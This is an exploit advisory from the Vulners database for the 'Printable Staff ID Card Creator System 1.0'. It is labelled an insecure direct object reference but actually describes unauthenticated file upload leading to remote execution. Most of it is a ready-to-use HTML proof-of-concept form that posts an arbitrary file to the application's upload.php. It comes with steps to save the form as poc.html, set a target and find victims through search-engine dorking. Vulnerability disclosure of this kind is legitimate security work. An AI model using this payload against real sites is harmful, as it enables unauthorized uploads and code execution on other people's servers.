Vulners
Lucene search
Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference
`=============================================================================================================================================
| # Title : printable staff id card creator system 1.0 idor Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419 |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .
[+] Line : 8 Set your Target
[+] Save As poc.html
[+] payload :
<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">
<div class="modal-header" style="background:#222d32">
<button type="button" class="close" data-dismiss="modal">×</button>
<h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>
SYSTEM INFORMATION INITIALISATION
</center></h4>
</div>
<form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">
<div class="modal-body">
<center>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>
Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">
<input type="hidden" name="page" value="admin.php">
</center>
</div>
<div class="modal-footer">
<input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial">
<button type="button" class="btn btn-success" data-dismiss="modal">Close</button>
</div>
</form></div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4